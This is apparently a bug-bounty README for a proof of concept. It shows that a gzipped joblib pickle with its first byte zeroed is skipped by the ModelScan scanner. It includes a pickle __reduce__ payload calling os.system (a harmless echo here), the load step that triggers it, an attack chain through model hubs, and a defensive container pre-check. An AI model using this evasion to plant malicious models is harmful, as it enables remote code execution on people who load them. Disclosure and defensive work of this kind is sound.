# ModelScan Bypass - Corrupt Compression Header

**Security Research - ModelScan Bypass Technique**

## Overview

This repository contains a proof-of-concept demonstrating a bypass technique for ModelScan, a popular ML model security scanner. This technique allows malicious pickle-based model files to evade detection.

## Technique

**Malformed compression header**

Gzip file with corrupted header (first byte modified to 0x00)

## File

- `exploit_corrupt_header.joblib.gz`

## Reproduction Steps

### Testing with ModelScan

```bash
# Install ModelScan
pip install modelscan

# Download the exploit file from this repository, then scan it
modelscan scan -p exploit_corrupt_header.joblib.gz
```

### Expected Result

SKIPPED - Scanner did not analyze this file

### Triggering the Exploit

```python
import joblib

# WARNING: This will execute arbitrary code!
model = joblib.load('exploit_corrupt_header.joblib.gz')
```

## Technical Details

This exploit uses Python's pickle `__reduce__` method for RCE:

```python
def __reduce__(self):
    import os
    return (os.system, ('echo "RCE executed!"',))
```
**Why ModelScan misses this:**

Because the gzip header is corrupted (first byte modified to 0x00), the scanner skips the file (SKIPPED, as shown under Expected Result) and never analyses the pickle payload it contains.
## Security Impact

**Severity**: HIGH

**Attack Vector**:

1. Attacker creates malicious model using this technique
2. Uploads to model hub (HuggingFace, etc.)
3. Victim downloads and scans with ModelScan
4. Scanner reports "No issues found!" or skips the file
5. Victim loads model → RCE
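A defensive pre-check for the gap in step 4, added here as an example and not part of this repository's code: it verifies that a file named `.gz` actually carries a gzip header and decompresses, and it treats a header mismatch, or a scanner result of SKIPPED, as a block rather than a pass. The sample bytes, the verdict strings and the `allow_load` gate with its `NO_ISSUES`/`SKIPPED` labels are constructed for this example, not ModelScan's own output.

```python
import gzip
import zlib

GZIP_MAGIC = b"\x1f\x8b"


def precheck_container(name: str, data: bytes) -> str:
    """Compare a model file's extension with its real bytes.

    Verdicts (constructed for this example):
      reject-bad-magic        .gz name but no gzip magic (tampered or mislabelled)
      reject-undecompressable gzip magic present but the stream is broken
      scan-gzip               well-formed gzip container, hand to the scanner
      scan-raw                no gzip claim, hand the raw payload to the scanner
    """
    claims_gzip = name.endswith(".gz")
    has_magic = data[:2] == GZIP_MAGIC
    if claims_gzip and not has_magic:
        return "reject-bad-magic"
    if has_magic:
        try:
            gzip.decompress(data)
        except (OSError, EOFError, zlib.error):  # BadGzipFile is an OSError
            return "reject-undecompressable"
        return "scan-gzip"
    return "scan-raw"


def allow_load(precheck: str, scanner_status: str) -> bool:
    """Fail closed: load only a file that passed the container check AND was
    actually analysed. A SKIPPED scan is not a clean scan.
    scanner_status labels are assumptions for this example."""
    return precheck.startswith("scan-") and scanner_status == "NO_ISSUES"


# Constructed samples (not the repository's exploit file): a valid gzip stream,
# the same stream with its first byte zeroed as in the Technique section,
# and a truncated stream that keeps its magic bytes.
GOOD = gzip.compress(b"placeholder payload, not a real model")
ZEROED_HEADER = b"\x00" + GOOD[1:]
TRUNCATED = GOOD[:-6]

if __name__ == "__main__":
    for name, blob in [("ok.joblib.gz", GOOD), ("corrupt.joblib.gz", ZEROED_HEADER),
                       ("cut.joblib.gz", TRUNCATED), ("raw.joblib", b"\x80\x04placeholder")]:
        print(f"{name:20} {precheck_container(name, blob)}")
```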
## References

- [Huntr Bug Bounty](https://huntr.com/)
- [ModelScan GitHub](https://github.com/protectai/modelscan)